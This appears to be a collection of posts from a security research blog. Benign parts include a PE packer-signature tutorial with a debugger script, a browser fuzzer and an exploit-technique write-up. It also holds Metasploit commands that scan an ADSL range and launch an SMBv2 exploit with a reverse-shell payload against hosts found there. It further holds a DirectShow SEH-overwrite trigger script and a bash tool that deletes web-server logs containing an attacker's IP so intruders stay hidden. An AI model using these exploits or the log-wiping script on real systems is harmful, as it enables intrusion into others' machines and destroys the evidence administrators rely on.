i,m really sorry for our late  in posting we really working on lots of things … before starting about our subject i should  tell you about our advisories and exploits we are not  really full-disclosure believers but still we will post some more exploits and advisories at  :

http://www.exploit-db.com/author/abysssec

so stay tuned.

OK let’s start  ….

=========================================

before start if you are not familiar with PE  : The Portable Executable (PE) format is a file format for executables, object code, and DLLs, used in 32-bit and 64-bit versions of Windows operating systems. The term “portable” refers to the format’s versatility in numerous environments of operating system software architecture.

for more information  :  http://en.wikipedia.org/wiki/Portable_Executable

- now the first question is what is a signature ?

a signature actually  is what that means but in computer world and more specific in reverse engineering and binary auditing  world a signature is a sequence of  unique instructions (actually their representation op-codes) in target binary.

for better understanding please watch figure 1

figure 1 – a c++ compiled binary opened in immunity debugger

reminiscence : an opcode (operation code) is the portion of a machine language instruction that specifies the operation to be performed.

in above figure it have tree red rectangular :

• first rectangular are RVA (relative virtual address) of instructions
• second rectangular are OP-Codes (will be execute)
• third rectangular are  readable assembly instructions

so we will search for a sequence of unique op-codes (so sequence of instructions)  in our target binary and those byte will be signature of our binary. simple enough eh ?

- what and who need to use a signature ?

• most of anti-virus (and other anti-things)
• and almost all of PE Detection tools

so now you can imagine how  an anti-virus company can detect a malware and how  PE-Detection tools  (witch areused for detecting signature in compiled binary and determine compiler / packer / compressor and … )  works .

- next question is why we need care about signatures:

• before starting any fuzzing / reversing / auditing project we need to about our target binary
• identify binaries those have not any signatures
• with them we can speed up our reversing and we can find available tools against our target binary

-how we can find signatures in binaries ?

we should search for static and constant location (static instructions) in our file but how we can find them? for answer to this question please watch PE file layout again :

figure 2 – PE file layout

we can search for signatures in a few areas :

• around program entry point (where program instructions will start execution …)
• from offset (from top to bottom)

each executable file have some other locations can be good for generating signature those are :

• around import table (where functions will be import)
• start and end of sections (optional section specially)
• name of optional / static sections
• ….

so we can just open the executable  under debugger and copy a few OP-Codes from entry point and we are done ? of course not ! because in lots of situations entry point could be change  refer to various factors like :

• initializing addresses / variables with state of program
• if we are in fighting against a packer / compressor / cryptor / there are several technologies they can use for hiding / changing instructions …

note : these changes are more on not “just compiled binaries” it means those have a packer / protector and ….

so how we can find reliable signatures ?

we need to research about variant program situations  and then we can understand which bytes/instructions are constant and which are not then we  can ignore dynamic bytes and rely to static bytes.

before a  real case study i just want explain how packer/protectors works :

a packer will do what it sounds : packing a program. think  about winzip it will comperes the program and actually will decrease size of program .

elementary packers just will compress the portable executable and will change entry point to decompression section for better understanding just watch below figure.

figure 3 How typical packer runtime works

1. Original data is located somewhere in the packer code data section
2. Original data is uncompressed to the originally linked location
3. Control is transferred to original code entry point (OEP)

Ok now you know how a basic packer works but today modern packers are not just compressor they will use a lots of anti-debugging  technologies against debugger / disassembler to make reverser life harder. this technologies are out of scope of  this post.

Ok for example if we want to make  a signature for a new packer / protector we need to pack / protect variant  executable (it’s better  to test on different compiler / size)  and then watch which byte of files are changed and which one are static !

you can use binary copy option in immunity debugger for starting our test

figure 4 binary copy

this program is  packed with a really simple and good packer named FSG.

and my first signature will be :

87 25 5C AD 41 00 61 94 55 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33

so now i need to pack more files and check my selected Op-codes to know which one are changed and then we will replace changed op codes with ?? .  after a few try we will get a signature like  :

87 25 ?? ?? ?? ?? 61 94 55 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33

so if i search for these bytes i can find i can find them in any program those are packed with FSG v2 !

this example is really really simple for advanced packer we need really test more bytes to be sure our signature is good enough but from my experience  length between 30-70 byte  from entry point are good enough.

if you be smart you will select good instructions like sections those have 16-bit registers and instructions those are not used all times. so an example of really good signature can be below figure (taken from symantec slides) :

figure 5 ( a really good signature )

OK. now you can make you own signatures just by spending a few time on each target . there are several tools can be use for detecting  signatures if executable most popular of them are :

• PEiD
• RDG Packer Detector
• PE Detective

but all of them have a same problem not so update signatures ! so if you have a program that is packed by a really new packer or just a few byte take changed from their signature  most of them will fail (intelligent signature detection is out of scope of this post) . so what we can do ? we should have our own database for our job .

so i collect all of existing signature database (those i found) in internet and i removed stupid and duplicated signature from the list those are :

• BoB at Team PEiD signature database
• Panda Security customized signature database
• Diablo2002 signature database
• ARteam members signature database
• SnD members signature database
• Fly signature database
• and …

after i combined all of their signature databases i changed a few of important signature to be more general and i added some new signature to my list  and my final list right now have around 5064 unique and 4268 from entry point signature.

PEiD can parse external signatures and it’s nice but i liked to have detection in my debugger so i searched for a signature detection library in python (i like python) and with a quick search i found nice Pefile coded by Ero Carrera can handle all of our requirement in working with PE file not only handling signatures you can download it at :

http://code.google.com/p/pefile/

so i decide to use this library to write a pycommand for immunity debugger fortunately i found a copy of a pefile in immunity debugger lib ! so all i have to do is writing a few line of code that can read my database and test it against my binary and tell me the output .
so here is my complete script also have a option for auto-update  .

#!/usr/bin/env python
 
'''
 This script is for identify packer/protector and compiler used in your target binary
 the first version have more than about 5000 signatures ... we will try to updates signatures monthly
 and for now it will use entry point scaning method ...
 
 Tree Important Notes :
 First  the database signatures are reaped by lots of people we should thanks them : BoBSoft at Team PEID  , fly , diablo2oo2 and others you can find their name in list ...
 Second A big thanks to Ero Carrera for his nice python pefile lib the hard part of processing singanutes is done by his library .
 Third  we updated some of signatures and will keep update them monthly  for detection newer version of packers / comprassion algorithm (hopefully) 
 
 thanks to nicolas waisman / Muts (offsec) and all of abysssec memebers ...
 
 Feel free to contact me with admin [at] abysssec.com
'''
 
#import python libraries
import os
import sys
import getopt
import pefile
import immlib
import peutils
import hashlib
import shutil
import urllib
 
__VERSION__ = '0.2'
 
DESC= "Immunity PyCommand PeDectect will help you to identfy packer / protection used in target binary"
USAGE = "!PeDetect"
 
#global
downloaded = 0
 
#Using debugger functionality
imm = immlib.Debugger()
 
# pedram's urllib_hook
def urllib_hook (idx, slice, total):
    global downloaded
 
    downloaded += slice
 
    completed = int(float(downloaded) / float(total) * 100)
 
    if completed > 100:
        completed = 100
 
    imm.Log("   [+] Downloading new signatures ... %d%%" % completed)
 
# Downloader function
def get_it (url, file_name):
    global downloaded
 
    downloaded = 0
    u = urllib.urlretrieve(url, reporthook=urllib_hook)
    #imm.Log("")
    shutil.move(u[0], file_name)
 
# Calculate MD5Checksum for specific file
def md5checksum(fileName, excludeLine="", includeLine=""):
    m = hashlib.md5()
    try:
        fd = open(fileName,"rb")
    except IOError:
        imm.Log("Unable to open the file in readmode:", filename)
        return
    content = fd.readlines()
    fd.close()
    for eachLine in content:
        if excludeLine and eachLine.startswith(excludeLine):
            continue
        m.update(eachLine)
    m.update(includeLine)
    return m.hexdigest()
 
# Simple Usage Function
def usage(imm):
    imm.Log("!PeDetect -u (for updating signature ... )" )
 
# Auto-Update function
def update():
 
    # Using urlretrieve won't overwrite anything
    try:
        download = urllib.urlretrieve('http://abysssec.com/AbyssDB/Database.TXT')
    except Exception , problem:
        imm.Log ("Error : %s"% problem)
 
    # Computation MD5 cheksum for both existing and our current database
    AbyssDB = md5checksum(download[0])
    ExistDB = md5checksum('Data/Database.TXT')
 
    imm.Log(" [!] Checking for updates ..." , focus=1, highlight=1)
    imm.Log("")
    imm.Log(" [*] Our  database checksum : %s "%AbyssDB)
    imm.Log(" [*] Your database checksum : %s "%ExistDB)
    imm.Log("")
 
    if AbyssDB != ExistDB:
 
        imm.Log("[!] Some update founds updating ....")        
 
        # Removing existing one for be sure ...
        if os.path.exists('Data/Database.txt'):
            os.remove('Data/Database.txt')
 
        # Download latest database
        try:
            get_it("http://abysssec.com/AbyssDB/Database.TXT", "Data/Database.txt")
        except Exception,mgs:
            return " [-] Problem in downloading new database ..." % mgs
 
        imm.log("   [+] Update Comepelete !")
 
    else:
        imm.Log(" [!] You have our latest database ...")
 
# Main Fuction
def main(args):
 
    if args:
        if args[0].lower() == '-u':
            update()
        else:
            imm.Log("[-] Bad argumant use -u for update ...")
            return  "[-] Bad argumant use -u for update ..."
    else:
        try:
            # Getting loded exe path
            path = imm.getModule(imm.getDebuggedName()).getPath()
        except Exception, msg:
            return "Error: %s" % msg
 
        # Debugged Name
        name = imm.getDebuggedName()
 
        # Loading loaded pe !
        pe = pefile.PE(path)
 
        # Loading signatures Database
        signatures = peutils.SignatureDatabase('Data/Database.TXT')
 
        # Mach the signature using scaning entry point only !
        matched = signatures.match(pe , ep_only=True)        
 
        imm.Log("===================  WwW.Abysssec.com  =======================")
        imm.Log("")
        imm.Log("[*] PeDetect By Shahin Ramezany" , focus=1, highlight=2)
        #imm.Log("=============================================================")
        imm.Log("[*] Total loaded  signatures : %d" % (signatures.signature_count_eponly_true + signatures.signature_count_eponly_false + signatures.signature_count_section_start))
        imm.Log("[*] Total ep_only signatures : %d" % signatures.signature_count_eponly_true)
        #imm.Log("=============================================================")
        imm.Log("")
 
        # Signature found or not found !
        if matched:
            imm.log("[*] Processing : %s " % name)
            imm.Log("[+] Signature Found  : %s "   % matched , focus=1, highlight=1)
            imm.Log("")
        else:
            imm.log("[*] Processing   %s !" % name)
            imm.Log("   [-] Signatue Not Found !" , focus=1, highlight=1)
            imm.Log("")
 
    # Checking for arguements !
        if not args:
            usage(imm)
 
        return "[+] See log window (Alt-L) for output / result ..."

for using this script you just need copy PeDetect.py in you PyCommand directory in immunity debugger python then copy Database.TXT in DATA folder in immunity debugger. after this you just need run it from immunity debugger command bar using !PeDetect you can see the output of this script against some files…

figure 6 – output of PeDetect against not packed file

figure 7 – output against  packed file

also this have an argument !PeDetect -u for updating your signature to our latest database. notice that my script will use md5checksum so your changes meaning it won’t be same as my database and your database will be update automatically.

figure 8 – update command

PS : after i wrote this i saw another PyCommand named scanpe wrote by BoB at PeiD it’s really good and have PE scan option but have not update update so no more new signatures …

references :

• Automatic Generation of String Signatures for Malware Detection
• Signature Generation by korupt (http://korupt.co.uk)
• Team PEiD forums
• Immunity Debugger online documentation
• FSecure – reverse engineering slides
• My time

download PeDetect (database + pycommand) from : (please read the ReadMe.txt for installation guide)

http://www.abysssec.com/files/PeDetect.zip

happy new years !

cheers

in a few recent days i worked on smbv2 ProcessID Function Table Dereference vulnerability and after lots of work actually i got my shell after kostya and rest of Immunity. but there is a good news for you Stephen Fewer finally released his exploit for metasploit too.

a note : stephen exploit is no so reliable refer to selecting address in HAL  but it’s free …

metasploit 3.3 DEV have this module by default .

and here are steps for exploitation using metasploit

step 0:

run msfconsole.bat

step 1 :

scanning for targets
msf > use auxiliary/scanner/smb/smb2
msf auxiliary(smb2) > set RHOSTS xx.xx.xx.x-xx.xx.xx.254
RHOSTS =>xx.xx.xx.x-xx.xx.xx.254
msf auxiliary(smb2) > set THREADS 50
THREADS => 50
msf auxiliary(smb2) > run

for example i found on my ADSL range  :

[*] xx.xx.xx.x supports SMB 2 [dialect 255.2] and has been online for 285 hours

step 2 :

now you need check version of founded target (i think it’s better to know before send your exploit)

msf auxiliary(smb2) > use auxiliary/scanner/smb/version
msf auxiliary(version) > set RHOSTS xx.xx.xx.x
RHOSTS => xx.xx.xx.x
msf auxiliary(version) > run

[*] xx.xx.xx.x is running Windows 7 Ultimate (Build 7100) (language: Unknown)
[*] Auxiliary module execution completed
msf auxiliary(version) > set RHOSTS xx.xx.xx.x
RHOSTS => xx.xx.xx.x
msf auxiliary(version) > run

[*] xx.xx.xx.x  is running Windows 7 Ultimate (Build 7229) (language: Unknown)
[*] Auxiliary module execution completed
msf auxiliary(version) > set RHOSTS xx.xx.xx.x
RHOSTS => xx.xx.xx.x
msf auxiliary(version) > run

[*] xx.xx.xx.x is running Windows Vista Home Basic Service Pack 2 (language: Unknown)
[*] Auxiliary module execution completed

as you may noticed i just found one windows vista and two others are windows 7 .this exploit will work against vista sp1-2 and windows 2008 (not rc2)

step 3 :

now you can set and send exploit

msf auxiliary(version) > use exploit/windows/smb/smb2_negotiate_func_index
msf exploit(smb2_negotiate_func_index) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
set msf exploit(smb2_negotiate_func_index) > set LPORT 5678
LPORT => 5678
msf exploit(smb2_negotiate_func_index) > set LHOST xx.xx.xx.x
LHOST => xx.xx.xx.x
msf exploit(smb2_negotiate_func_index) > set RHOST xx.xx.xx.x
RHOST => xx.xx.xx.x
msf exploit(smb2_negotiate_func_index) > exploit

and here is output of metasploit exploit on my target :

note : i will try to have a technical detail post  for exploitation and also my version of exploit for you soon.

happy hunting

shahin

For example :
when html5 comes , Firefox added html5 features to itself too.  and a clever Attacker could recognizing  this change and we will be able to find Security holes .

for more information please read :

w3.org publish paper with this title: HTML 5 differences from HTML 4
http://www.w3.org/TR/2009/WD-html5-diff-20090212/
and take HTML5 Overview :
http://dev.w3.org/html5/spec/Overview.html

please  pay attention to differences between FF3 & FF3.5 :

These changes include support for the <video> and <audio> tags as defined in the HTML 5 specification, with a goal to offer video playback without being encumbered by patent issues associated with many video technologies.

Cross-site XMLHttpRequests (XHR), which can allow for more powerful web applications and an easier way to implement mashups, are also implemented in 3.5.

A new global JSON object contains native functions to efficiently and safely serialize and deserialize JSON objects, as specified by the ECMAScript 3.1 draft.

Full CSS 3 selector support has been added. Firefox 3.5 uses the Gecko 1.9.1 engine, which includes a few features that were not included in the 3.0 release. Multi-touch support was also added to the release, including gesture support like pinching for zooming and swiping for back and forward.

and then milw0rm.com publish new exploit in “Firefox font tag !”
http://www.milw0rm.com/exploits/9137

we are not bloodsucker , we try to act like a  real hacker , Real hacker (Pen-tester i mean)  think about how to find  this type of bug .

since we know about all of  new  features in  new web browsers  such as of FF  and we can test features as a security researcher as well.

Browser Vulnerability Assessment  has tree  step :

1 – Find HTML or XML or javascript <tag> browser can support , for example :
http://msdn.microsoft.com/en-us/library/ms533050%28VS.85%29.aspx [IE]

2- find  Properties , Methods , Collections , Events ,Constants , Prototypes , HTML Elements for each <tag> .

3- misuse property of <tag> or fuzzed tag for buffer-overflow and other memory corruption vulnerabilities (in this case)

for example :
we want find memory corruption vulnerability using ,  unbound check in  <font> tag,  in  Internet explorer 8 !:
<font color=”#727272″>test</font>

take a look at  “MSDN” :
http://msdn.microsoft.com/en-us/library/ms535248%28VS.85%29.aspx

second : find “Attribute” and “property” of <font> tag , such as :
‘color’, ‘face’, ’size’, ‘class’, ‘id’, ’style’, ‘title’, ‘dir’, ‘lang’, ‘accesskey’, ‘tabindex’

third  : build random character for “overflows ” , “FormatString”  , and other memory corruptions …

for example to be more clear i wrote a really basic fuzzer in python :

(for sure this is not a commercial fuzzer)

# Abysssec Inc public material
# Simple Browser Fuzzer
# www.Abysssec.com
#garbage char
overflows = ['A' * 10, 'A' * 20, 'A' * 100, 'A' * 200]
fmtstring = ['%n%n%n%n%n', '%p%p%p%p%p', '%s%s%s%s%s', '%d%d%d%d%d', '%x%x%x%x%x']
numbers   = ['0', '-0', '1', '-1', '32767', '-32768', '2147483647', '-2147483647', '2147483648', '-2147483648']
 
# FONT property 
fontpropery = ['color', 'face', 'size', 'class', 'id', 'style', 'title', 'dir', 'lang', 'accesskey', 'tabindex']
 
 
#basic Automated Fuzzer :
i = 0 
 
 
for x in fontpropery:
     for y in overflows:
    	tag = "<font " + x + "='"  + y + "'>TEST</font>"
    	i = i + 1
	file = open( str(i) + ".html","w")
	file.writelines('<head><meta http-equiv="refresh" content="1; url=' + str(i+1) + '.html"></head>')
	file.writelines(tag)
	file.close()
 
     for y in fmtstring:
    	tag =  "<font " + x + "='"  + y + "'>TEST</font>"
    	i = i + 1
	file = open( str(i) + ".html","w")
	file.writelines('<head><meta http-equiv="refresh" content="1; url=' + str(i+1) + '.html"></head>')
	file.writelines(tag)
	file.close()
 
     for y in numbers:
    	tag =  "<font " + x + "='"  + y + "'>TEST</font>"
    	i = i + 1
	file = open( str(i) + ".html","w")
	file.writelines('<head><meta http-equiv="refresh" content="1; url=' + str(i+1) + '.html"></head>')
	file.writelines(tag)
	file.close()

for start fuzzing , add refresh page with next page . [for start fuzz click 1.html]

another way :

“Jeremy Brown”  developed this a fuzzer for general browser fuzzing” :

1. Written in PERL
2. CSS/DOM/HTML/JS fuzzing comprehensive
3. Specialized functions for fuzz page generation & writing
4. Decent file structure easily supporting add/del/modification
5. 3rd generation [unlimited style, web] fuzzing oracle implemented

http://www.krakowlabs.com/dev/fuz/bf2/bf2.pl.txt

this fuzzer is good but it’s really simple too and can’t find new vulnerabilities without modifying but   you can extend it for new method of browser <tag > fuzz .

more info :

http://www.krakowlabs.com/dev/fuz/bf2/bf2_doc.txt

Browser Auditing :

browser source code auditing  is actually white-box testing  and only is useful when you have  an open source browser like  Firefox  and …. .

source code auditing is really practical , but need higher then  knowledge in programming (always C/C++)
for example , in firefox :
you can download all versions  source code from here :
ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases

more source code of FF written by C++ , my interested  C++ source code Auditor is : CPPcheck
http://sourceforge.net/apps/mediawiki/cppcheck

i,m sorry about length of this post . this post is not really deep but take my apology because we are really busy.

and this write-up is for  tell you we are “not dead”

wait for out new advisories + exploits soon as soon possible

god speed you

Daphne
———–
unfortunately , we had mistake in our simple fuzzer , now edit & repaired .
thanks .
Daphne /

but we are busy but i have some good news and i will share with you soon . for  now i want to have short talk about new DirectShow vulnerabilities  one of this vulnerability is more fun and exploited in the wild in past days .and now exploit is  available in the wild.

anyway here is orginal advisory  (another good vulnerability from alex wheeler):

http://www.microsoft.com/technet/security/advisory/972890.mspx

this vulnerability can be exploit using  varient browser exploitation method like Heap Spray.

and flowing simple script can trigger vulnerabilty :

#!/usr/bin/python
import sys , os
 
gif =  "\x00\x03\x00\x00\x11\x20\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
gif += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
gif += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
gif += "\xFF\xFF\xFF\xFF"    # End of SEH chain
gif += "\x41\x41\x41\x41"    # SE Handler
gif += "\x00"
 
fp = open("directshow.gif","wb")
fp.write(gif)
fp.close()

var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='directshow.gif;
// Vulnerable ID
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

here you can see overwritten SEH

and here you can see Spared Heap

finally as you can see here we got a shell

using methods like java-script obfuscation and shirking variables can make this exploit more dangerous . and you can find this exploit at :

http://trac.metasploit.com/browser/framework3/trunk/modules/exploits/windows/browser/msvidctl_mpeg2.rb

and:

http://milw0rm.com/exploits/9108

Happy Hunting.

PS : i will try to have a technical post soon as soon possible

Cheers .

shahin

we are not dead , just really busy in doing our projects . but there is a few notes  I’d like to enclose with you  .first of all about 2 Web Based vulnerability we’ve report to milw0rm .  we haven’t free time to working on educational sources . and those vulnerability was special for us because those portal was commercial portals uses for our “government”  , “private” web sites. and we’ve report those for helping our autonomous applications .

by the way if you like to see those vulnerabilities here you are :

first DOURAN Portal <= 3.9.0.23 Multiple Remote Vulnerabilities

second Dana Portal Remote Change Admin Password Exploit

third about adobe exploit my next  writeup will be about PDF hacking / exploiting stuff (soon) .

and finally about future :

we believe to “no more free bugs” so after reporting a few more vulnerabilities / exploit maybe we don’t report more transparent / reliable exploit (as past) . maybe just PoC’s or just papers or just advisories titles or … . but who knows ?!

then :

we will try to update site with respectable index and more post on our blogs but you should take our apology for our late and unfaithfulness .

and final note :

unfortunately for a few reasons we disabled  commenting system on blogs but feel free to contact us with our mails.

for now you can use admin [at] abysssec.com .

keep on to visit us .

hope to see you soon .

This article is only for who attend php as well and really knowing how to program In PHP.

When we talk about PHP Vulnerability discovery, we forget this Question:
What types of bugs?

When we can answer this Question, we will gain to find vulnerability as well as drink some water.

Reading in  this article :

Section 1 : (20 ways to PHP source code Auditing – PHP Fuzzing)
1- Cross Site Scripting
2- SQL Injection [medium]
3- HTTP Response Splitting [Medium]
4- Dynamic Evaluation Vulnerabilities [High]
5- Process Control / PHP Code Injection (HIGH)
6- Local / Remote file inclusion (High)
7 – File Management (HIGH)
8- Buffer overflows (High, But Hard Usage)
9- Cookie / Session injection / Fixation / [High]
10 – Denial Of service [Medium, But Hard Assessment]:
11 – XPath Injection [XML Functions]
12 – Often Misused: File Uploads (High)
13 – Un-Authorize summon of Functionality / File (Medium)
14 – Authentication Bypass with Brute Force (Low)
15 – Insecure Randomness Session / Cookie / Backup files (Medium)
16 – Informative details in HTML Comments (Low)
17 – Default unnecessary installation files (medium)
18 – Regular Expression Vulnerability (High)
19 – Resource Injection (Medium)
20 – Week Password / Encryption: (Low)

Section 2:
Automatic PHP Auditor source code

This article is not a full reference about PHP source code security review (a.k.a auditing) but I tried to do this work in my short time as well. So please take my apology about all of mistakes (maybe) I made during completing this article.  I’m not sure but maybe I’ve release future version of this article that contain a few more advanced methods.

Here is some of future talk and topics may I add this article in next version:
1-    More Real world Attack with Description
2-    PHPIDS Defense.
3-    More Dangerous Functions: CURL – socket – creat_function & ….
4-    Talk About pear functions and security of used.
5-     Information About Books of PHP Securea Coding.
6-     And ETC

Download :

php-fuzzing-auditing-version-1.0

thanks.

Daphne

i wrote this exploit 2 hour after publishing PoC on milw0rm

but now there is a lots of mirror and version of this exploit on net !

maybe i release DEP-enabled / IE protection bypass version on variant os too .

Anyway Here is the code :

http://abysssec.com/blog/wp-content/uploads/2009/02/ms09-002-exploit.txt

mirror : http://milw0rm.com/exploits/8079

Cheers !!!

i know , i know i have a big absence about 2 month . but i,m back with a big update for you .

a step by step article about exploiting format string vulnerabilities on windows platform.

here is download link for this article :

http://abysssec.com/blog/wp-content/uploads/2009/02/fstring-exploit.pdf

feel free to send your questions to admin@abysssec.com|NoSpam

Good Luck and Have Fun !

Here is bash script for finding path of log files (Apache first and soon : all Logs) and deleting them for some attackers to be hidden from server admins !.Not bad ? Not good ? Where u use that !?.

At first we find path of directory contain some wanted logs and then searching line by line for log paths,finally founding attacker Ip in log files and removing log file. Be happy !

TEsTed On Debian etch4.0 and FreeBSD 6*

This is Rc 1. [download] : Log_f

and here is source code in bash :

#!/usr/local/bin/bash
### coded by t4z3v4r3d
### recurse function : i m not sure who has write that .So thanks unknown man
### made for FreeBSD First ....
if [ "`id -u`" != "0" ];then
echo "$0 cant run as $USER Please Give me the root perms!!!!! "
exit 1
fi
patern=$2
fl=/tmp/f.txt
fd=/tmp/find.txt
length=/tmp/l-f.txt
log_f=/tmp/log_f.txt
log_final=/tmp/final_log.txt
null=/dev/null
log_path=/tmp/log_Found_.txt
tm="`date | cut -d ":" -f 1`"
os=$OSTYPE
# you can add all paths for all os type !M$ windows IS NOT OS ....Exactly!
case $os in
Linux*) path=/etc/
;;
linux*) path=/etc/
;;
freebsd*) path=/usr/local/
;;
*) path=/
;;
esac
 
rm $fl
touch $fl
rm $fd
touch $fd
rm $log_f
touch $log_f
rm $log_final
touch $log_final
rm $log_path
touch $log_path
clear
 
echo "Enter attacker IP"
read -e ip
 
if [ "`find $path -name apache >> $fl`" ];then
	echo -e "\033[3;2f Main path Found ....\033[0;0m"
else
 
	if [ "`find $path -name apache2 >> $fl`" ];then
		echo "Founded Apache2 Config files"
	fi
fi 
 
recurse () {
for file in $(/bin/ls $1)
do fqfn=$1/$file
[[ -d $fqfn ]] && recurse $fqfn
[[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; }
[[ -f $fqfn ]] && recurse $fqfn
[[ ${#file} -gt $len ]] && { len=${#file} name=$fqfn; }
 
#########################################################
if [ -f $1 ];then
let "f=f+1"
	if [ "`ls $1 | grep -F .conf`" ];then
	let "t=t+1"
	cat $1 | grep -F .log | grep -v "#" | cut -d " " -f 2  >> $log_path
	nom[$t]="`cat $1 | grep -F .log | grep -v "#" | wc -l`"
	echo -e "reading $1\n `cat $1 | grep -F .log | grep -v "#"`" >> /tmp/r.txt
	let "nt=nt+${nom[$t]}"
	let "j=$nt+$t"
	fi
fi
################################################################################
### MOnitoring all acts
################################################################################
echo -e "\033[3;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m"
echo -e "\033[1;39m|\033[1;31m Scanned Files  :\033[4;25f \033[1;37m$f\033[1;39m\033[4;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m Path(s) found  :\033[5;25f \033[1;37m$l\033[1;39m\033[5;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m pattern found  :\033[6;25f \033[1;37m$t\033[1;39m\033[6;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;31m pattern total  :\033[7;25f \033[1;37m$j\033[1;39m\033[7;40f|\033[0;0m"
echo -e "\033[1;39m|\033[1;30m\033[8;2f Scanning `dirname ${1}`:::\033[1;39m\033[8;40f|\033[0;0m"
echo -e "\033[9;1f\033[1;39m+\033[1;37m======================================\033[1;39m+\033[0;0m"
##############################################################################
done ; }
 
reader(){
cat $fl | while read line ;do
if [ "`ls $line | grep .conf`" != "" ];then
	recurse $line
fi
let "l=l+1"
done
}
 
reader
 
log_path_reader(){
cat $log_path | while read line ;do
if [ -f $line ];then
if [ "`cat $line | grep "$ip"`" != "" ];then
echo -en "\033[1;30mFounded[\033[1;31m"`cat $line | grep -c "$ip"`"	\033[1;30m] $ip in	"
echo -n "Removing $line"
rm $line
 
if [ ! -f $line ];then
echo -e "\033[1;39m	... Done !\033[0;0m"
else
echo -e "\033[1;31m	...Failed!\033[1;0m"
fi
 
fi
else
echo -e "\033[1;30mFile [\033[1;31m"$line    "\033[1;39mFile Dose not exist......\033[1;30m]"
fi
 
let "l2=l2+1"
done
}
echo -e "\033[8;3f\033[1;31mpath= $path OS= $os\033[0;0m"
echo -e "\033[11;1f\033[1;30mScanning DONE!! NOW : Removing Log Files\033[0;0m"
 
log_path_reader
 
echo -en "\033[1;30mRemoving 				   $0	"
 
rm $fl $log_path $0
 
 if [ ! -f  $0 ];then
 	echo -e "\033[1;39m	... Done !\033[0;0m"
 else
 	echo -e "\033[1;31m	...Failed!\033[1;0m"
 fi
echo -e "\033[1;37m Mail: amiri@abysssec.com\033[0;0m"

—————————————————

daphne  :

Hi readers .

Thanks from mr.Amiri .

when we’re talking about the secret or hidden in server , Log files in unix , linux server , recorded everything . this script is usefull for [white hacker ] and manager to clear major log files .

Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit -

Another step towards perfect exploitation

This is my next article explaining my second public exploit implementing my recent Shellhunting technique.

Why use the technique? Well, believe me I could have made the exploit work on only one Windows version, be it XP or Vista, but to make it universal and work on every Windows NT system, you need to make it advanced.

The vulnerability itself is a normal stack overflow, overflowing all the variables on the stack including, the holy grail, the return address. There is also no character transformation, so why use a shellhunter for the exploit?

Here is why:-

1. To overflow the buffer, 280 bytes and above are needed, this isn’t enough space for a shellcode such as, reverse/bind shell or dl/exec scode, maybe only executing calculator will work.
2. To make it universal there was only one module that had the address, that module is the main applications executable: hhw.exe.
   
3. This address includes a “\x00″ byte (00h), this NULL byte will terminate any more overflow of the buffer so you cannot just simply jump/call the ESP register and execute shellcode after the controllable return address.

Those are the main reasons that need to be worried about. A professional exploit needs to be able to run any shellcode of any capability and size.With the Shellhunter the shellcode may even include NULL bytes!

Lets recap what a shellhunter does:-

1. Searches through memory for a certain “lookout” value that when located will revert program execution flow to the address at the “lookout”. Also the “lookout” values must be a set of friendly instructions that will not cause an unneeded “Access Violation”.
2. In this case there is no need for it to be alphanumerical, also size does not matter.

The new shellhunter in this exploit will be very different from the previous one. It will search through the whole memory of the application looking for the shellcode, it will not be using any register as a base to search from. The technique will also be reminiscent of skape’s egghunter technique (I actually have never read his article, but it is pretty cool that there will be a new/fresh look at this type of exploitation with my method ).

Okay, so what are the new features I am talking about? The shellhunter has indeed increased drastically in size (111 bytes) and the freedom that there are no character restrictions makes it even easier. With that privilege I thought of searching the whole memory with the shellhunter.

Of course there are a few problems that come to mind with that:

• Access Violations will occur when retrieving data from an invalid address.
• We need to store the variable which is address currently searched.
• The applications memory is a huge range from 0×00000000 to just below kernel base which is, 0×7fffffff. The shellhunter must search through the memory in speed, so that the shellcode will be executed fast.
• Also, but I’ll discuss about this later, the stack layout has to be repaired by the shellhunter..

Wow, a load of problems.

Now I will write up how I solved them.

Access Violation problem when reading invalid memory

The first method that came to mind was to use the Structured Exception Handling, and that is the method I am using.

Basically the SEH, will handle exceptions when an exception is thrown out it will change the program flow to the address that is in SEH structure. It is in the basic form a linked list type, this is its layout on the stack:

[ Pointer to the next SEH record]

[Pointer to exception handler code]

Altogether it will occupy 8 bytes on the stack. Using it to our advantage we will need to make the “Pointer to exception handler code” point to our injected code from the overflowed buffer. And in our case, the Pointer to the next SEH record will be set to -1, which in hex form is 0xffffffff.

If you read the shellhunter code correctly you will say its sort of a loop. And you are right. It is a loop that it searches for the “lookout” value, if invalid, exception occurs and then again all over we set up SEH and check for “lookout”.

Save the current address variable somewhere in the heap

In this problem I used the address 0×7ffdfad0. Before setting up SEH, it will retrieve the variable at the address and before checking the value with a CMP, so not to lose the address, it will store it at that address.

Speedy search through memory

At the beginning when the shellhunter was in a premature phase, it searched through 4 bytes at a time. Trust me, It took a lot of time. To solve the problem, I used 32 bytes. But this also needed to increase the amount of “lookout” values that needed to be in the memory so the shellhunter would find it guaranteed (you can see that there are over 64*4 bytes of “lookout” value in the exploit!).

Repairing the Stack layout

This was one of the last problems I encountered when writing the shellhunter. I noticed that when SEH was called and the appropriate modules made their calls and other calculations, the stack would change. It would approximately decrease the ESP register by a couple hundred bytes. We cannot afford to have that because when the ESP register becomes a very low value, a stack overflow exception occurs, and when that is handled there is no space for any SEH to be set up! So to repair the stack I added bytes to the stack at every loop of the shellhunter also using a few pops/pushs instructions to increase the certain measure.

